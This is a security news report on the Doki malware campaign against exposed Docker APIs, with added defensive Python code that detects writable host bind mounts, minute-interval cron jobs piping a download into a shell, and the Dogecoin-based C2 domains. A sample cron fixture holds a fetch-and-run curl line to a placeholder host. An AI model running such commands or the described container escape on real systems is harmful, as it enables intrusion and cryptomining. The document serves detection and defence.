Attackers are targeting misconfigured cloud-based Docker instances running on Linux distributions with an undetectable strain of malware.
Dubbed Doki, the malware strain is part of the Ngrok Cryptominer Botnet campaign, active since at least 2018.
What makes Doki particularly interesting is the dynamic way it connects to its command and control (C2) infrastructure.
Rather than relying on a specific domain or a set of malicious IPs, Doki uses dynamic DNS services like DynDNS. Combined with a novel blockchain-based Domain Generation Algorithm (DGA), it can generate and locate the address of its C2 server in real time and "phone home."
The malware's behavior is so stealthy that it went undetected for over six months despite having been submitted to the malware analysis engine VirusTotal on January 14, 2020, as shown in a new report from Intezer.
Even today, as observed by BleepingComputer, only six antivirus engines flag this sample as malicious, according to VirusTotal:
To conduct their campaign, the threat actors actively search for exposed, Internet-accessible Docker cloud instances. As of today, Shodan alone shows over 2,400 such instances running Linux on Amazon AWS infrastructure.
That doesn't necessarily mean all of these containerized cloud environments are vulnerable, but it is an example of where prying eyes could be looking to identify their victims.
Once publicly accessible Docker API ports have been identified, the attackers begin spawning their own cloud instances on these environments and possibly deleting existing ones.
A legitimate "alpine-curl" image is used by the attackers to set up their instances and then run malicious code through it, all while flying under the radar.
"The advantage of using a publicly available image is the attacker doesn't need to hide it on Docker hub or other hosting solutions. Instead, the attackers can use an existing image and run their logic and malware on top of it," reads the report.
Once the attackers have created their container, they must escape out of it in order to exploit the server and execute code on the hosting machine. A neat trick of mounting a network drive, as also leveraged by other attacks, does the job.
"The technique is based on the creation of a new container, done by posting a 'create' API request. The body of the request contains configuration parameters for the container. One of the parameters is bind, which lets the user configure which file or directory on the host machine to mount into a container," explains Intezer.
When done correctly, the attackers are then able to access and modify every file on the hosting machine's filesystem from within their newly created container.
Using third-party services such as Ngrok, the attacker downloads the malicious payload and configures the host's cron utility (remember, they can now alter the host filesystem outside of the container) to run the payload every minute.
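The escape-and-persist sequence described above (a writable bind mount of the host filesystem, followed by a minute-interval cron job that fetches and runs a payload) leaves two artifacts a defender can check for directly. The following is an added example, not Intezer's tooling or anything from the report: it reads `docker inspect`-style JSON and a crontab, both constructed inline here, and flags containers with writable bind mounts of sensitive host paths (the sensitive-path list is my assumption) and cron lines that run every minute and pipe a download into a shell.

```python
"""Detect the container-escape and persistence pattern described above
from `docker inspect` output and the host crontab. This is an added example,
not Intezer's tooling; the JSON and crontab below are constructed samples."""
import json
import re

# Host paths that, bind-mounted read-write into a container, hand the container
# the host filesystem or a persistence location such as cron. (Constructed list.)
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/spool/cron", "/etc/cron.d")

# Constructed `docker inspect` output: a benign web container and one that
# mounts the host root read-write, the shape the report attributes to Doki.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.19"},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
    },
    {
        "Name": "/escape-test",
        "Config": {"Image": "alpine-curl"},
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
    },
])

# Constructed crontab: one routine job, one minute-interval fetch-and-run job
# (placeholder host, .invalid TLD).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL http://placeholder-tunnel.invalid/p | sh
"""


def parse_bind(bind):
    """Split 'host:container[:opts]' into (host, container, set_of_opts)."""
    parts = bind.split(":")
    host, container = parts[0], parts[1]
    opts = set(parts[2].split(",")) if len(parts) > 2 else set()
    return host, container, opts


def is_sensitive_bind(bind):
    """True when the host side is a sensitive path (or an ancestor of one)
    and the mount is writable."""
    host, _, opts = parse_bind(bind)
    host = host.rstrip("/") or "/"
    if "ro" in opts:
        return False
    if host == "/":
        return True
    return any(p == host or p.startswith(host + "/") for p in SENSITIVE_HOST_PATHS)


def audit_containers(inspect_json):
    """Return (container_name, reason) findings from `docker inspect` JSON."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "?").lstrip("/")
        image = c.get("Config", {}).get("Image", "")
        host_cfg = c.get("HostConfig", {})
        for bind in host_cfg.get("Binds") or []:
            if is_sensitive_bind(bind):
                findings.append((name, f"writable host bind mount {bind} (image {image})"))
        if host_cfg.get("Privileged"):
            findings.append((name, "privileged container"))
    return findings


EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def suspicious_cron_lines(crontab_text):
    """Return crontab lines that run every minute and pipe a download into a
    shell, the persistence mechanism the report describes."""
    hits = []
    for line in crontab_text.splitlines():
        m = EVERY_MINUTE.match(line.strip())
        if m and REMOTE_FETCH.search(m.group("cmd")):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for name, reason in audit_containers(SAMPLE_INSPECT):
        print(f"[container] {name}: {reason}")
    for line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(f"[cron] {line}")
```

On a real host, feed it `docker inspect $(docker ps -aq)` and the contents of `/etc/crontab`, `/etc/cron.d/*` and the root user's crontab; a read-only mount of a sensitive path is deliberately not flagged, since the escape depends on being able to write to the host.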
The payload, equipped with state-of-the-art network scanning and reconnaissance tools such as zmap, zgrab, and jq, then begins identifying other targets running services like Redis, Docker, SSH, and HTTP.
This information is then passed to another Ngrok URL so that various malware binaries and crypto-miners can be dropped on the target machines.
What stands out across the entire attack workflow is the attacker's ability to obtain complete control not only of their newly created container but of the server instance as well, thanks to the legitimate API commands they can run.
To generate its C2 domain, the malware queries a legitimate Dogecoin cryptocurrency explorer, dogechain.info. It looks for the value of Dogecoins sent out from an attacker-controlled "hardcoded wallet address."
The first 12 hex characters of the SHA256 digest of this value serve as the C2 domain's label on DynDNS. An example domain provided in the report is: 6d77335c4f23[.]ddns[.]net
However, there is also a silent 'kill' command. Should the attacker have sent no Dogecoins out of this wallet, the sent value returned by dogechain.info would be "0.00000000".
The malware knows that the SHA256 digest of this value starts with "46927e019820" and is programmed to halt execution should it generate this particular C2 domain during its workflow.
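Because the domain derivation is fully described above, a defender can reproduce it offline: given the wallet's sent-value as observed in a sandbox run or on the explorer, compute the candidate C2 hostname for a DNS blocklist, and separately match DNS logs for hostnames of that 12-hex-character DynDNS shape. The following is an added example, not Intezer's or the malware's code. It assumes the digest is taken over the decimal amount string exactly as the explorer returns it and that the suffix is the `.ddns.net` seen in the report's example; the amounts and log lines are constructed, and the kill-switch prefix is computed at runtime rather than copied from the report.

```python
"""Reproduce the C2 domain derivation described above for blocklisting, and
match DNS logs for hostnames of that shape. Added example, not Intezer's or
the malware's code; runs offline on constructed values."""
import hashlib
import re

DDNS_SUFFIX = ".ddns.net"          # suffix of the report's example domain (assumption)
KILL_VALUE = "0.00000000"          # value returned when nothing was sent from the wallet
# Derived at runtime; the report gives this prefix as 46927e019820.
KILL_PREFIX = hashlib.sha256(KILL_VALUE.encode()).hexdigest()[:12]
# Twelve lowercase hex characters followed by the DynDNS suffix.
DGA_SHAPE = re.compile(r"^[0-9a-f]{12}\.ddns\.net\.?$")


def derive_c2_domain(sent_value):
    """First 12 hex characters of SHA256(sent_value) as the DynDNS label."""
    digest = hashlib.sha256(sent_value.encode()).hexdigest()
    return digest[:12] + DDNS_SUFFIX


def is_kill_switch(domain):
    """The domain derived from a zero sent-value halts the malware instead of beaconing."""
    return domain == KILL_PREFIX + DDNS_SUFFIX


def blocklist_candidates(observed_values):
    """Domains to block for each observed wallet value, minus the kill-switch domain."""
    domains = []
    for value in observed_values:
        domain = derive_c2_domain(value)
        if not is_kill_switch(domain) and domain not in domains:
            domains.append(domain)
    return domains


def defang(domain):
    """Render a domain safely for reports and tickets."""
    return domain.replace(".", "[.]")


def matching_dns_queries(log_lines):
    """Return queried names from constructed 'timestamp client qname' log lines
    that have the 12-hex-character DynDNS shape."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) >= 3 and DGA_SHAPE.match(parts[2]):
            hits.append(parts[2])
    return hits


# Constructed inputs: two hypothetical amounts plus the zero value.
OBSERVED_VALUES = ["13.37000000", "42.00000000", KILL_VALUE]
# Constructed resolver log; the second name is the report's example domain.
SAMPLE_DNS_LOG = [
    "2020-07-28T10:00:01Z 10.0.0.5 www.example.com",
    "2020-07-28T10:00:02Z 10.0.0.5 6d77335c4f23.ddns.net",
    "2020-07-28T10:00:03Z 10.0.0.7 updates.ddns.net",
]

if __name__ == "__main__":
    for d in blocklist_candidates(OBSERVED_VALUES):
        print("block:", defang(d))
    print("kill-switch domain:", defang(KILL_PREFIX + DDNS_SUFFIX))
    print("DGA-shaped queries:", matching_dns_queries(SAMPLE_DNS_LOG))
```

The shape match on its own is a weak signal (any 12-hex-character DynDNS label matches), so treat it as a pivot for investigation and use the derived domains, which are exact, for blocking; if the wallet value format on the explorer differs from the plain decimal string assumed here, the derived label will not match the one the malware computes, so validate against a known sample before relying on it.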
"This attack is very dangerous due to the fact the attacker uses container escape techniques to gain full control of the victim's infrastructure. Our evidence shows that it takes only a few hours from when a new misconfigured Docker server is up online to become infected by this campaign," said Intezer.
The Indicators of Compromise (IOCs) associated with the sample have been provided in Intezer's report and on VirusTotal.
A list of defensive techniques, Docker "best practices," and YARA rules aimed at detecting the malware have also been provided in the same report.
Checksum (SHA-256): 4aadb47706f0fe1734ee514e79c93eed65e1a0a9f61b63f3e7b6367bd9a3e63b
Possible filename(s): 8656be257806daee79e96a4102798abbg